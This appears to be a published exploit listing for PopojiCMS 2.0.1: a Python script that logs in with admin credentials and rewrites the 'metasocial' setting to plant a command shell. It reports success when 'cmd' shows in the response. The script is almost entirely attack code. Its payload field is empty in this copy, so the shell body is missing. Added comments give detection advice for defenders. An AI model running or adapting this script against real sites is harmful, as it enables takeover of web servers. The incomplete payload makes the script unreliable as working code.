Exploit Title: PopojiCMS 2.0.1 - Remote Command Execution

Date: 14/04/2024

Exploit Author: Ahmet Ümit BAYRAM

Vendor Homepage: https://www.popojicms.org/

Software Link: https://github.com/PopojiCMS/PopojiCMS/archive/refs/tags/v2.0.1.zip

Version: 2.0.1

Tested on: https://www.softaculous.com/apps/cms/PopojiCMS

import sys
import time

import requests

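def exploit(url, username, password):
    """Log in to the PopojiCMS admin panel and rewrite the "metasocial" setting.

    This is an authenticated proof of concept for PopojiCMS 2.0.1: it only
    proceeds when the supplied administrator credentials are accepted. It sends
    two POST requests on one session and reports progress on stdout.

    Args:
        url: Base URL of the installation; "/po-admin/..." is appended as-is,
            so it is expected without a trailing slash.
        username: Administrator account name.
        password: Administrator account password.

    Returns:
        None in every case; the outcome is only printed.
    """
    login_url = f"{url}/po-admin/route.php?mod=login&act=proclogin"
    login_data = {"username": username, "password": password}
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "Referer": f"{url}/po-admin/index.php",
    }

    # One Session so the admin cookie set by the login carries to the next POST.
    session = requests.Session()
    login_response = session.post(login_url, data=login_data, headers=headers)

    # Login success is judged purely by a marker string in the response body.
    if "Administrator PopojiCMS" in login_response.text:
        print("Login Successful!")
        time.sleep(1)  # wait 1 second
    else:
        print("Login Failed!")
        return

    # Detection: this request is the step that matters to defenders. A POST to
    # route.php with mod=setting&act=metasocial carrying a "meta_content" field
    # changes a site-wide setting; alert on it in web logs and review the
    # stored value for anything other than plain meta tags.
    # NOTE(review): the server side is not shown on this page. Presumably the
    # stored value is later emitted where it is interpreted as code; confirm
    # against the application source before relying on that.
    edit_url = f"{url}/po-admin/route.php?mod=setting&act=metasocial"
    # The body between the <html> tags is empty in this copy of the listing
    # and is reproduced exactly as it appears here.
    edit_data = {"meta_content": "<html>\n\n\n</html>"}
    edit_response = session.post(edit_url, data=edit_data, headers=headers)

    # Success is inferred from the literal "cmd" appearing in the response.
    if "cmd" in edit_response.text:
        print("Your shell is ready:", url)
        time.sleep(1)
    else:
        print("Exploit Failed!")
        return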

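# Script entry point. The guard as printed on the page ("name" / "main") lost
# its double underscores; restored so the module can be imported without
# side effects.
if __name__ == "__main__":
    # Exactly three positional arguments are required: base URL, admin
    # username, admin password. ("Kullanım" is Turkish for "Usage".)
    if len(sys.argv) != 4:
        print("Kullanım: python exploit.py sitename username password")
        sys.exit(1)

    url = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]

    # The sleeps only pace the console output; they have no protocol role.
    print("Exploiting…")
    time.sleep(1)
    print("Logging in…")
    time.sleep(1)
    exploit(url, username, password)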